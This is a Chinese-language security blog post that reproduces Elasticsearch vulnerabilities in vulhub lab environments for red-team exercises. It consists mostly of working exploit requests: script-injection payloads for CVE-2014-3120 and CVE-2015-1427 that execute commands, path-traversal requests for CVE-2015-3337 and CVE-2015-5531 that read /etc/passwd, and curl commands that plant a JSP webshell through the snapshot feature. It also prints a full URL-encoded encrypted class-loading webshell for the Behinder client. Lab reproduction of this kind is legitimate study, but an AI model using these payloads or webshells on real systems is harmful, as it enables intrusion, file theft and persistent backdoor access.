Elasticsearch漏洞集合

2020年12月25日08:36:50评论384 views字数 5296阅读17分39秒阅读模式

本文复现环境都是来自vulhub，复现这个原因是在攻防演练中遇到Elasticsearch相对来说还是较多的。以下复现语言简洁，从word里面复制出来的图片较模糊

1.未授权访问获取敏感信息

/_cat/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status

Elasticsearch漏洞集合

2.CVE-2014-3120远程代码执行

访问环境

Elasticsearch漏洞集合

提交数据包，创建一条数据

POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22
{  "name": "test"}

Elasticsearch漏洞集合

创建成功之后，就可以执行代码了

POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 356
{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();"        }    }}

Elasticsearch漏洞集合

反弹shell需进行编码

http://www.jackson-t.ca/runtime-exec-payloads.html

Elasticsearch漏洞集合

3.CVE-2015-1427远程代码执行

访问环境

Elasticsearch漏洞集合

发送POST数据包,创建一个数据

POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22
{  "name": "test"}

Elasticsearch漏洞集合

创建成功，然后执行代码

POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()"}}}

Elasticsearch漏洞集合

进行编码，反弹shell

Elasticsearch漏洞集合

4.目录穿越CVE-2015-3337

访问环境

Elasticsearch漏洞集合

/_cat/plugins：查看所有已安装的插件

Elasticsearch漏洞集合

需使用burp发包访问，浏览器验证不了

GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Elasticsearch漏洞集合

5.目录穿越CVE-2015-5531

访问环境

Elasticsearch漏洞集合

使用PUT请求，创建一个仓库

PUT /_snapshot/test HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 108
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/test"     }}

Elasticsearch漏洞集合

使用同样方法创建一个快照

PUT /_snapshot/test2 HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 126
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"     }}

Elasticsearch漏洞集合

访问

http://192.168.100.180:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Elasticsearch漏洞集合

需要解码,在控制台可以输入String.fromCharCode(里面就是这些数字)

Elasticsearch漏洞集合

6.Elasticsearch写入webshell漏洞

访问环境

Elasticsearch漏洞集合

写入webshell前提你得知道网站路径

首先创建一个恶意索引文档

终端执行

curl -XPOST http://192.168.100.180:9200/yz.jsp/yz.jsp/1 -d '{"<%newjava.io.RandomAccessFile(application.getRealPath(new String(newbyte[]{47,116,101,115,116,46,106,115,112})),new String(newbyte[]{114,119})).write(request.getParameter(new String(newbyte[]{102})).getBytes());%>":"test"}'

Elasticsearch漏洞集合

载创建一个恶意的存储库

curl -XPUT 'http://192.168.100.180:9200/_snapshot/yz.jsp' -d '{ "type":"fs", "settings": { "location":"/usr/local/tomcat/webapps/wwwroot/", "compress": false }}'

Elasticsearch漏洞集合

存储库验证并创建

curl -XPUT "http://192.168.100.180:9200/_snapshot/yz.jsp/yz.jsp" -d '{     "indices": "yz.jsp",     "ignore_unavailable": "true",     "include_global_state": false}'

Elasticsearch漏洞集合

访问8080端口，验证文件是否可以访问

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp

Elasticsearch漏洞集合

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串，参数为f

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e

写入webshell，需进行url编码，不然不会成功的

http://192.168.100.180:8080/wwwroot/test.jsp

Elasticsearch漏洞集合

可以看见已经写入进去了，使用冰蝎连接

Elasticsearch漏洞集合

本文始发于微信公众号（MrLee 小师父）：Elasticsearch漏洞集合

左青龙
微信扫一扫

右白虎
微信扫一扫

Elasticsearch漏洞集合

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

hacker10101

主权与信任：网络时代的供应链安全

深入了解DHCP

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

【论文速读】|大语言模型（LLM）智能体可以自主利用1-day漏洞

发表评论

在线咨询

微信